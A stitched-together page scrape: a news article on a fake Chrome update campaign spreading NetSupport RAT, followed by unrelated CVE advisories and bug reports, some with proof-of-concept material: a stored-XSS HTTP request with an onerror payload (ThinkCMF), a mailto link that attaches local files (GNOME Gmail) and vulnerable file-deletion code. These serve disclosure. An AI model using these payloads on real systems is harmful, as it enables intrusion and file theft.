By Waqas
Trellix Uncovers Deceptive Chrome Browser Update Campaign Leveraging NetSupport Manager RAT.
This is a post from HackRead.com Read the original post: Fake Chrome Browser Update Installs NetSupport Manager RAT

*   **Fake Chrome Browser Update Scam:** Trellix exposes a scheme using fake Chrome browser updates to sneak NetSupport Manager onto victim computers, granting cybercriminals control and data access.

*   **Possible SocGholish Link:** While resembling SocGholish, differences in tools raise doubt about a direct connection, highlighting evolving tactics.

*   **Compromised Sites as Launchpads:** Compromised websites act as launchpads for the attack, affecting diverse sectors, including government and finance.

*   **Deceptive Path to RAT:** Victims fall for the fake update, unknowingly downloading a malicious JavaScript file, “Browser\_portable.js,” which activates NetSupport Manager.

*   **Urgent Need for Vigilance:** Trellix’s discovery underscores the critical importance of global threat intelligence and advanced security solutions in countering evolving cyber threats.

Cybersecurity firm Trellix has identified a new cyber campaign exploiting unsuspecting victims by disguising itself as a legitimate Chrome browser update. The deceptive scheme employs a malicious remote administration tool (RAT) known as NetSupport Manager RAT, allowing threat actors to gain unauthorized access to victims’ computers and seize control.

Moreover, the Trellix Advanced Research Center uncovered striking similarities to a previously reported SocGholish campaign, although a definitive connection remains elusive. Yet, concrete links between the two campaigns remain scarce.

The campaign, which came to light in late June 2023, exploits compromised websites as a platform for delivering the fraudulent Chrome update. Victims are lured into downloading and installing the fake update, unwittingly inviting the NetSupport Manager RAT onto their systems. The malware allows cybercriminals to pilfer sensitive information and manipulate victim computers to their advantage.

The modus operandi of the campaign involves injecting compromised websites with a carefully crafted HTML script tag that retrieves JavaScript content from the attackers’ command and control server.

This technique, seemingly automated, hinges on the unsuspecting victims falling for the fake browser update ruse. The success of the scheme relies heavily on the prevalence of compromised websites.

Trellix researchers found evidence of this campaign infiltrating a Chamber of Commerce website, with traffic from governmental entities, financial institutions, and consulting services. Although the site has since been cleansed of the injected script, it suffered compromise for at least one day.

The deceptive journey commences when victims encounter the injected script on a compromised website, leading them to a fake browser update page. This manipulation, which directs users to unwittingly install the NetSupport RAT, isn’t novel; similar tactics have been documented in past instances like the SocGholish campaign.

Fake Chrome Browser Update page (Screenshot: Trellix)

However, it’s the tools employed in the present campaign that stand apart from SocGholish. SocGholish exploited PowerShell with WMI capabilities to facilitate RAT download and installation. In contrast, the current campaign utilizes batch files (.BAT), VB scripts, and the Curl tool to carry out its malevolent operations. The use of these distinct tools underscores the evolving strategies of cybercriminals.

Should a victim succumb to the allure of the fake browser update and click on the “Update Chrome” link, a ZIP archive named “UpdateInstall.zip” containing a malevolent JavaScript file, “Browser\_portable.js,” is initiated for download. This script serves as a downloader for the ensuing stage of the attack.

Upon extraction of the NetSupport Manager RAT via the downloaded 7-zip utility, execution transpires via a scheduled task, orchestrated by the “2.bat” batch file. Furthermore, this batch file also engenders persistence for the RAT, ensuring automatic execution upon system startup.

The malevolent configuration file (“client32.ini”) for the RAT reveals a gateway address set to 5.252.178.48. At this juncture, with the RAT firmly entrenched within the victim’s system, threat actors possess substantial control, enabling them to execute further malware deployment, data exfiltration, network reconnaissance, and lateral movement.

The infection chain (Screenshot: Trellix)

In conclusion, this campaign serves as a reminder that threat actors consistently exploit successful techniques to advance their malicious agendas. The deployment of familiar lures, such as the phony browser update, underscores the persistent nature of these attacks.

The proliferation of RATs, while not always updated, showcases their enduring utility for cybercriminals. As attackers adopt increasingly sophisticated tactics, the challenge of detection intensifies. The utilization of native Windows scripting languages, like VBScript and Batch script, combined with tools like Curl, exemplifies their adaptability and innovation.

Joseph Tal, Senior Vice President of Trellix’s Advanced Research Center, cautioned that the prevalence of these NetSupport RAT attacks underscores the need for comprehensive global threat intelligence and innovative security solutions.

Commenting on this, Dr Klaus Schenk, senior vice president, Security and Threat Research at Verimatrix told Hackread.com that _“_The reports of threat actors exploiting fake Chrome browser updates to spread the NetSupport Manager Remote Access Trojan are concerning. While the attack vector of abusing browser updates is common, this particular campaign stands out for its sophistication and targeting. The attribution to the SocGholish group, known for cyber espionage aligned with Russian state interests, makes this a high-priority threat._“_

_“_While the details connecting this attack to SocGholish are inconclusive, the examination by Trellix seems reliable. The threat actors clearly spent time crafting a credible lure using Chrome’s market dominance. I recommend to wait a bit to see if this attacks manifests — but it would be a good idea to prioritise incident response and user education to detect and mitigate this threat,” Tal added.

_“_Even though users must still click a malicious link, the sophistication of this attack makes it likely to evade defenses. We should continue monitoring for new developments, but organisations should act swiftly to harden systems, update browsers, and inform personnel about this threat,” Tal recommend.

Nevertheless, the continually evolving threat landscape necessitates a proactive and holistic approach to cybersecurity, particularly as more enterprises rely on Chromium-based browsers for their web applications.

**RELATED ARTICLES**

1.  New malware in pirated games disables Windows Updates
2.  Fake ROBLOX &Nintendo game cracks drop ChromeLoader malware
3.  Fake Chrome & Firefox browser update lead users to malware infection
4.  Over 20 million Chrome users have installed fake malicious Ad Blockers
5.  Big Head Ransomware Found in Malvertising and Fake Windows Updates

Fake Chrome Browser Update Installs NetSupport Manager RAT

xterm before 380 supports ReGIS reporting for character-set names even if they have unexpected characters (i.e., neither alphanumeric nor underscore), aka a pointer/overflow issue.

CVE-2023-40359: XTERM - Change Log

Categories: News
Tags: Zoom

Tags:  YouTube

Tags:  Chrome

Tags:  TikTok

Tags:  ransomware

Tags:  Cloudflare

Tags:  robocallers

Tags:  security advisor

A list of topics we covered in the week of August 7 to August 13 of 2023



(Read more...)




The post A week in security (August 7 - August 13) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner  

Free Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (August 7 - August 13)

### Impact
Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) bug.

### Patches
The bug has been fixed in `v0.0.20`.

### Workarounds
Upgrading Critters version to `>0.0.20` is the easiest fix. This is a non breaking version upgrade so we recommend all users to use `v0.0.20`.

**Critters Cross-site Scripting Vulnerability**

High severity GitHub Reviewed Published Aug 9, 2023 in GoogleChromeLabs/critters • Updated Aug 11, 2023

GHSA-cx3j-qqxj-9597: Critters Cross-site Scripting Vulnerability

An issue was discovered in decode_frame in libavcodec/tiff.c in FFmpeg version 4.3, allows remote attackers to cause a denial of service (DoS).

**\[FFmpeg-devel\] \[PATCH 7/7\] avcodec/tiff: Disallow striped and tiled tiffs except for DNG****Michael Niedermayer** michael at niedermayer.cc 
_Fri Nov 6 01:11:10 EET 2020_

* Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
* Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
* **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

strips + tiles is not allowed in TIFF
DNG uses a separate codepath

Regression since da5b3d002862d1e105002a6dc1567e6551860896.

Fixes: NULL pointer dereference
Fixes: poc1

Found-by: 1vanChen of NSFOCUS Security Team
Signed-off-by: Michael Niedermayer <michael at niedermayer.cc\>
---
 libavcodec/tiff.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/libavcodec/tiff.c b/libavcodec/tiff.c
index 2e45464218..00f0c0ccf7 100644
--- a/libavcodec/tiff.c
+++ b/libavcodec/tiff.c
@@ -1923,14 +1923,17 @@ again:
 has\_strip\_bits = s->strippos || s->strips || s->stripoff || s->rps || s->sot || s->sstype || s->stripsize || s->stripsizesoff;
 
 if (has\_tile\_bits && has\_strip\_bits) {
- av\_log(avctx, AV\_LOG\_WARNING, "Tiled TIFF is not allowed to strip\\n");
+ int tiled\_dng = s->is\_tiled && is\_dng;
+ av\_log(avctx, tiled\_dng ? AV\_LOG\_WARNING : AV\_LOG\_ERROR, "Tiled TIFF is not allowed to strip\\n");
+ if (!tiled\_dng)
+ return AVERROR\_INVALIDDATA;
 }
 
 /\* now we have the data and may start decoding \*/
 if ((ret = init\_image(s, &frame)) < 0)
 return ret;
 
- if (!s->is\_tiled) {
+ if (!s->is\_tiled || has\_strip\_bits) {
 if (s->strips == 1 && !s->stripsize) {
 av\_log(avctx, AV\_LOG\_WARNING, "Image data size missing\\n");
 s->stripsize = avpkt->size - s->stripoff;
-- 
2.17.1

* Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
* Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
* **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the ffmpeg-devel mailing list

CVE-2020-36138: Disallow striped and tiled tiffs except for DNG

An issue was discovered in pcmt superMicro-CMS version 3.11, allows attackers to delete files via crafted image file in images.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

gift89a opened this issue

Jan 14, 2021

· 2 comments

Closed

**Arbitrary file deletion vulnerability #1**

gift89a opened this issue

Jan 14, 2021

· 2 comments

**Comments**

**Vulnerability exploitation conditions: Log in to the management background**

Vulnerable code: superMicro-CMS-main/admin/images.php line:151

\` if (array\_key\_exists('submit2', $\_POST)) { // Delete

 	$imagename = trim($_POST['delete']);
 	$delete = '../img/' . $imagename; //**$imagename, User controllable parameters**
 	// $disallowed = array('img-loading.gif', 'nav-icon.jpg');
 
 	if (strlen($imagename) < 1) {
 		$problem = TRUE;
 		$response = 'No image filename was entered.';
 	}
 
 	// Admin images moved to admin
 
 	if (($imagename == 'og.jpg') || ($imagename == 'bg_footer.gif') || ($imagename == 'bg_footer_monochrome.gif')) {
 		$problem = TRUE;
 		$response = "The default images can't be deleted. Maybe upload a new one (og.jpg must be 200 pixels square).";
 	}
 
 	if (!$problem) {
 		if (file_exists($delete)) {
 			unlink($delete); //**Unfiltered, can directly all files**
 			$response = 'Success. ' . $imagename . ' was deleted.';
 		} else {
 			$response = 'Image ' . $imagename . ' doesn\'t exist. Try another.';
 		}
 	}
 }`
 

Vulnerability POC：

Thanks for that too. Will do it.

Changes made. Thanks again.

2 participants

CVE-2021-25856: Arbitrary file deletion vulnerability · Issue #1 · pcmt/superMicro-CMS

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

An issue was discovered in attach parameter in GNOME Gmail version 2.5.4, allows remote attackers to gain sensitive information via crafted "mailto" link.

Following the email conversation with David I am raising this security issue as agreed (or some might say a feature/expected behavior)

**Summary** 
By using the "mailto?attach=..." parameter, a website can make GNOME Gmail attach local files to an email message without showing a warning to the user, additionally when user writes an email they can't see that there is an attachment on some systems. Please see test.gif for a demonstration.

To summarize it is an analog of CVE-2020-11879 in GNOME Evolution KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail. https://twitter.com/jensvoid/status/1295357952480751616 Jens originally found this type of issue in email clients. As Jens wrote in the bugzilla report 613425 I quote: "_This is arguable a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk (and also email from the victim's IMAP account), if the victim sends an email based on attacker controlled mailto input and misses the attachment being added._"

**How to reproduce**

1. Have GNOME Gmail client installed on Ubuntu and choose GNOME GMail and Chrome as default browsers (I tested on Ubuntu 20.04 and 18.04.4 with latest stable Chrome)
2. Copy Tux.png to /tmp directory
3. Open test.html
4. Click "Send email"
5. In the GNOME Gmail fill the "To" and "Subject" fields
6. Click send

 
test.html

 <html>
 <body>
 POC test
 <a href="mailto:alikhan@uzakov.io?attach=/tmp/Tux.png">Send email</a>
 </body>
 </html>
 

Tux.png https://en.wikipedia.org/wiki/File:Tux.png 
**Additional information** 
On Ubuntu 18.04.4 with Chrome version 83.0.4103.116 attachment isn't shown, as you can see in demo above 
On Ubuntu 20.04 with the latest stable Chrome attachment is shown

CVE-2020-24904: Security issue · Issue #84 · davesteele/gnome-gmail

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

Tag

#chrome